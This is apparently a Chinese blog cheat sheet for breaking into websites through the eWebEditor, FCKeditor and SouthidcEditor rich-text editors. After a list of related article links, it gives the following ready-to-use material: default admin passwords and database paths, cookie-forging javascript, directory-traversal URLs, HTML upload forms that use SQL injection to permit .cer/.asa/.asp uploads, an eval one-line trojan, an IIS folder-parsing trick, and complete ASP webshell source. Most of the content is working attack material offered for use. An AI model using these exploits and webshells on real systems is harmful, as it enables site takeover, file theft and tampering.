ewebeditor

  1. 默认数据库路径:[PATH]/db/ewebeditor.mdb
  2. [PATH]/db/db.mdb
  3. [PATH]/db/%23ewebeditor.mdb
  4. 默认密码:admin/admin888 admin/admin 进入后台,也可尝试 admin//admin888
  5.  
  6. 系统默认:ewebeditor.asp?id=content1&style=standard
  7. 样式调用 eWebEditor.asp?id=&style=standard1
  8.  
  9. 查看版本:
  10. edit/dialog/about.html
  11. ewebeditor/dialog/about.html
  12. eweb/dialog/about.html
  13. ewebedit/dialog/about.html
  14. ewindoweditor/dialog/about.html
  15. /ewebeditor.asp?id=NewsContent&style=s_full 出现一堆编辑框,有远程上传,先点感叹号!查看版本!
  16.  
  17. 直接访问:Admin_Private.asp
  18. eWebEditor2..0最终版删除任意文件漏洞: Example\NewsSystem目录下的delete.asp
  19. phpupload.html
  20. 新密码设置为 ":eval request("h")' 设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了
  21. /ewebeditornet/upload.aspx 直接cer马,不能上传则输入javascript:lbtnUpload.click();查看源代码找地址,默认uploadfile这个文件夹
  22. jsp的版本,根本没有对上传文件类型进行检测!需要注意的是jsp版本的没有上传按钮!直接选择文件,回车就可以提交了!
  23. ewebeditor可以列目录,在ewebeditor后面添加admin_uploadfile.asp?id=&dir=../..
  24.  
  25. ------------------------------------------------
  26. eWebEditor踩脚印式入侵
  27. 脆弱描述:
  28. 当我们下载数据库后查询不到密码MD5的明文时,可以去看看webeditor_style()这个样式表,看看是否有前辈入侵过 或许已经赋予了某控件上传脚本的能力,构造地址来上传我们自己的WEBSHELL.
  29. 攻击利用:
  30. 比如 ID= s-name =standard1
  31. 构造 代码: ewebeditor.asp?id=content&style=standard
  32. ID和和样式名改过后
  33. ewebeditor.asp?id=&style=standard1
  34. -------------------------------------------------
  35.  
  36. --------------------------------------------------
  37. eWebEditor遍历目录漏洞
  38. 第一种:ewebeditor/admin_uploadfile.asp?id=
  39. 在id=14后面添加&dir=..
  40. 再加 &dir=../..
  41. &dir=http://www.xxx.com/../.. 看到整个网站文件了
  42. 第二种: ewebeditor/admin/upload.asp?id=&d_viewmode=&dir =./..
  43. ---------------------------------------------------
  44.  
  45. ---------------------------------------------------
  46. cookie欺骗: /eWebEditor/admin/login.php - admin_login.asp
  47. 随便输入一个用户和密码,会提示出错了.
  48. javascript:alert(document.cookie="adminuser="+escape("admin"));
  49. javascript:alert(document.cookie="adminpass="+escape("admin"));
  50. javascript:alert(document.cookie="admindj="+escape(""));
  51. ---------------------------------------------------
  52.  
  53. 2.1.6的 直接用此exp
  54. <HTML><HEAD><TITLE>ewebeditor的upload文件上传exp</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head><body bgcolor=orange>
  55. <tr>不是通杀,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br></tr>
  56. <tr>文件传到了uploadfile目录下了</tr><br>
  57. <tr>不知道算不算0day,我是冰的原点</tr><br>
  58. <tr>至于利用方法就是修改源文件中的action,然后传cer的马马就行了!</tr><br>
  59. <form action="http://www.yunsec.net/ewebeditor/upload.asp?action=save&type=IMAGE&style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a" method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size= style="width:100%"><input type=submit value=传吧></form>
  60.  
  61. 2.1.6以前版本的用此exp
  62. <H1>ewebeditor asp1.0.0 上传漏洞利用程序----By HCocoa</H1><br><br>
  63. <form action="http://www.yunsec.net/ewebeditor/upload.asp?action=save&type=IMAGE&style=hcocoa' union select S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer|aspx',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
  64. <input type=file name=uploadfile size=><br><br>
  65. <input type=submit value=Fuck>
  66. </form>
  67.  
  68. 如果目录不充许执行脚本,要换目录,用这个exp.... /db可以自定义,不过要绝对路径!
  69. <form action="http://www.yunsec.net/upload.asp?action=save&type=IMAGE&style=horind' union select S_ID,S_Name,S_Dir,S_CSS,[S_UploadDir]%2b'/../db',S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
  70. <input type=file name=uploadfile size=><br><br>
  71. <input type=submit value=Fuck>
  72. </form>
  73.  
  74. 2.7.0版本注入点
  75. http://www.XXX.COM/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
  76. 默认表名:eWebEditor_System默认列名:sys_UserNamesys_UserPass,然后利用nbsi进行猜解,对此进行注入取得账号密码
  77.  
  78. ewebeditor 2.7. 上传漏洞:这个用在修改了可以上传asa但是提示没有工具栏的情况下
  79. <form action="http://www.yunsec.net/ewebedit/upload.asp?action=save&type=&style=可以上传asa的样式名" method=post name=myform enctype="multipart/form-data">
  80. <input type=file name=uploadfile size= style="width:100%">
  81. <input type=submit value="上传了"></input>
  82. </form>
  83.  
  84. 这个要下载它的数据库看有没有前辈的脚印才能利用!
  85. ewebeditor 2.8. 上传漏洞:前提要开启远程上传,然后传一个webshell.jpg.asp即可,查看源代码即可获得shell地址。
  86. 0day我从来没成功过,不知道是真还是假!不过用另一个成功过
  87. http://www.yunsec.net/ewebeditor.asp?id=NewsContent&style=s_full
  88. 调用这个样式,会出现远程上传按纽,再用下面的方法远程上传!
  89. 远程上传时执行代码,导致get shell
  90. .把x.jpg.asp xiaoma.ASa放在同一目录下
  91. ——————x.jpg.asp ————————————————————————————————————
  92. <% Set fs = CreateObject("Scripting.FileSystemObject") Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),,false,) Thetext=MyTextStream.ReadAll response.write thetext %>
  93. ——————————————————————x.jpg.asp————————————————————
  94.  
  95. ————————xiaoma.ASa——————————————————————————
  96. <%on error resume next%> <%ofso="scripting.filesystemobject"%> <%set fso=server.createobject(ofso)%> <%path=request("path")%> <%if path<>"" then%> <%data=request("dama")%> <%set dama=fso.createtextfile(path,true)%> <%dama.write data%> <%if err= then%> <%="success"%> <%else%> <%="false"%> <%end if%> <%err.clear%> <%end if%> <%dama.close%> <%set dama=nothing%> <%set fos=nothing%> <%="<form action='' method=post>"%> <%="<input type=text name=path>"%> <%="<br>"%> <%=server.mappath(request.servervariables("script_name"))%> <%="<br>"%> <%=""%> <%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%> <%="<br>"%> <%="<input type=submit value=save>"%> <%="</form>"%>
  97. ————————xiaoma.ASa——————————————————————————
  98.  
  99. .远程上传x.jpg.asp
  100. 受影响文件:eWebEditorNet/upload.aspx
  101. 利用方法:添好本地的cerShell文件。在浏览器地址栏输入javascript:lbtnUpload.click();就能得到shell。嘿嘿....绕过了限制......成功的上传了ASPX文件....文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....
  102.  
  103. php版:给出exp
  104. <form action="" method=post enctype="multipart/form-data">
  105. <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="">
  106. URL:<input type=text name=url value="http://192.168.1.110/eWebEditor/" size=><br>
  107. <INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||
  108. gif|jpg|jpeg|bmp||||||||||||||||||||||||EDIT||||||||||||||||||||||||Office||||||zh-cn|||||||||||||||...|||FF0000||||||宋体|||||||||jpg|jpeg||||||FFFFFF|||">
  109. file:<input type=file name="uploadfile"><br>
  110. <input type=button value=submit onclick=fsubmit()>
  111. </form><br>
  112. <script>
  113. function fsubmit(){
  114. form = document.forms[];
  115. formform.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en';
  116. alert(form.action);
  117. form.submit();
  118. }
  119. </script>

fckeditor

  1. Fckeditor的版本。
  2. FCKeditor/_whatsnew.html
  3. FCKeditor/editor/dialog/fck_about.html
  4.  
  5. /FCKeditor/editor/dialog/imageuser.php 截断上传php asp aspx
  6. /fckeditor/editor/fckeditor.html
  7.  
  8. -----------------------------------------------
  9. JSP为例子的文件配置:查看配置和列出目录下的文件.
  10. http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
  11. http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=../&CurrentFolder=%2F
  12.  
  13. /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
  14.  
  15. 上传地址:
  16. http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
  17. http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector.jsp ../为根目录
  18. ----------------------------------------------
  19.  
  20. 其次,你确定下以下几个上传页面是否真的被删除了呢?
  21. /FCKeditor/editor/dialog/imageuser.php
  22. /FCKeditor/editor/filemanager/browser/default/browser.html
  23. /FCKeditor/editor/filemanager/browser/default/connectors/test.html
  24. /FCKeditor/editor/filemanager/upload/test.html
  25. /FCKeditor/editor/filemanager/connectors/test.html
  26. /FCKeditor/editor/filemanager/connectors/uploadtest.html
  27.  
  28. 嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么
  29. /fckeditor/editor/filemanager/connectors/aspx/connector.aspx
  30. /fckeditor/editor/filemanager/connectors/asp/connector.asp
  31. /fckeditor/editor/filemanager/connectors/php/connector.php
  32. 如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例
  33. 1.查看Media目录下的文件:
  34. /fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
  35. 红色Media可以更改为File或者image,相应的进入文件或者图片目录下
  36. 2.利用iis解析漏洞创建1.asp特殊目录
  37. fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp
  38. 红色的是对应的Media目录,蓝色的是特殊目录名字
  39. 3.构建表单,上传webshell到特殊目录
  40. <form id="frmUpload" enctype="multipart/form-data" action="http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2F1.asp" method="post">
  41. Upload a new file:<br>
  42. <input type="file" name="NewFile" size="50"><br>
  43. <input id="btnUpload" type="submit" value="Upload">
  44. </form>
  45.  
  46. Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
  47. <form id="frmUpload" enctype="multipart/form-data"
  48. action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
  49. <input type="file" name="NewFile" size="50"><br>
  50. <input id="btnUpload" type="submit" value="Upload">
  51. </form>
  52.  
  53. 其他上传地址
  54. FCKeditor/_samples/default.html
  55. FCKeditor/_samples/asp/sample01.asp
  56. FCKeditor/_samples/asp/sample02.asp
  57. FCKeditor/_samples/asp/sample03.asp
  58. FCKeditor/_samples/asp/sample04.asp

southidceditor

  1. http://www.xxx.com/admin/southidceditor/datas/southidceditor.mdb
  2. http://www.xxx.com/admin/southidceditor/admin/admin_login.asp
  3. http://www.xxx.com/admin/southidceditor/popup.asp
  4. http://www.xxx.com/admin/southidceditor/login.asp
  5.  
  6. http://www.xxx.com/admin/Southidceditor/admin_style.asp?action=copy&id=14
  7. http://www.xxx.com/admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
  8. http://www.xxx.com/admin/Southidceditor/ewebeditor.asp?id=57&style=southidc

最后说2句:

在粘贴复制之前,首先确定目标是windows还是linux. 对于大小写敏感.

例如:/FCKeditor/editor/filemanager/browser/default/connectors/test.html

与 /fckeditor/editor/filemanager/browser/default/connectors/test.html 均得测试看看.

利用编辑器漏洞ewebeditor-fckeditor-southidceditor的更多相关文章

  1. FCKeditor编辑器漏洞

    目录 FCKeditor asp网页 aspx网页 php网页 jsp网页 FCKeditor FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的 ...

  2. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

  3. 利用CVE-2018-0950漏洞自动窃取Windows密码

    i春秋作家:浅安 0×00 前言 记得还在2016年的时候,我的一个同事那时还在使用CERT BFF(自动化模糊测试工具),他向我询问到如何将微软办公软件中看起来可利用的漏洞转化成可以运行的病毒程序并 ...

  4. SQLmap是一款用来检测与利用SQL漏洞的注入神器。

    sqlmap 重要参考 http://www.kali.org.cn/forum-75-1.html SQLmap是一款用来检测与利用SQL漏洞的注入神器.开源的自动化SQL注入工具,由Python写 ...

  5. 利用ms17_010漏洞实验

    1.理论 在MSF里面msfconsole可以说是最流行的一个接口程序.但是msfconsole真的是一个强大的接口程序.Msfconsole提供了一个一体化的集中控制台.通过msfconsole,你 ...

  6. FCK编辑器漏洞总结

    1.查看编辑器版本FCKeditor/_whatsnew.html————————————————————————————————————————————————————————————— 2. Ve ...

  7. fck编辑器漏洞想到的--目录的执行权限

    结合近来我遇到的问题,转一篇关于目录的执行权限问题.来解决fck编辑器的漏洞.漏洞就是给人家上传了文件,而且还遍历目录或者直接执行文件,,非常大大的危险. 解决方法如下. 1,首先要删除fckedit ...

  8. 利用JBoss漏洞拿webshell方法

    JBoss是一个大型应用平台,普通用户很难接触到.越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但 ...

  9. 利用App漏洞获利2800多万元,企业该如何避免类似事件?

    上个月,上海警方抓捕了一个利用网上银行漏洞非法获利的犯罪团伙,该团伙利用银行App漏洞非法获利2800多万元. 据悉,该团伙使用技术软件成倍放大定期存单金额,从而非法获利.理财邦的一篇文章分析了犯罪嫌 ...

随机推荐

  1. (DP)uva 10036 Problem C: Divisibility

    链接: http://acm.hust.edu.cn/vjudge/contest/view.action?cid=88171#problem/F 代码: #include <cstdio> ...

  2. Python + selenium + unittest装饰器 @classmethod

    前言 前面讲到unittest里面setUp可以在每次执行用例前执行,这样有效的减少了代码量,但是有个弊端,比如打开浏览器操作,每次执行用例时候都会重新打开,这样就会浪费很多时间. 于是就想是不是可以 ...

  3. [label][javascript-Unit Test][JSLint]A Guide To JSLint Messages

    原文链接: http://www.jameswiseman.com/blog/2011/03/26/coding-convention-an-style-guide/ http://www.james ...

  4. Android-Activity启动模式(launchMode)

    Activity启动模式是非常重要的一块内容,启动模式直接关系到用户的体验 和 性能的提升等 Activity启动模式分为四种: 如果不配置:launchMode,默认就是:standard 标准的 ...

  5. 自我介绍及注册github和上传文件

    自我介绍: 周侃 年龄20 喜好:玩游戏,赚钱,交际 理想:想要改变中国手游界颓靡的时代,让它进入新次元. 注册github,以及上传文件: 今天给大家来讲解下如何注册githup 当我们打开gith ...

  6. MVP社区巡讲 12月5日北京站| 12月12日上海站

    2015年底的社区巡讲Powered MVP Roadshow正式启动啦!12月5日周六下午北京场,12月12日周六下午上海场. 欢迎各位邀请您的同事朋友来参加MVP的社区活动,也邀请您发送活动信息( ...

  7. ajax 与 form 提交的区别

    有如下几种区别: 1. Ajax在提交.请求.接收时,都是异步进行的,网页不需要刷新:Form提交则是新建一个页面,哪怕是提交给自己本身的页面,也是需要刷新的: 2. A在提交时,是在后台新建一个请求 ...

  8. Python 定制类 特殊方法

    1.特殊方法 定义在class中 不需要直接调用,python的某些函数或操作符会自动的调用对应的特殊方法. 如定义了person类,使用print p 语句打印person类的实例时,就调用了特殊方 ...

  9. 自己从0开始学习Unity的笔记 IV (C#循环练习输出素数)

    来测试一下循环....刚刚学了while循环,测试一下输出1-100的素数 我想了一下,素数就是只能被1和本身整除,那就是只能被整除2次,我是顺着这个思路写的代码,如果被整除超过2次,那么肯定不是素数 ...

  10. JAVA—编码问题

    一.编码.(引用  百度百科) 编码是信息从一种形式或格式转换为另一种形式的过程也称为计算机编程语言的代码简称编码.用预先规定的方法将文字.数字或其它对象编成数码,或将信息.数据转换成规定的电脉冲信号 ...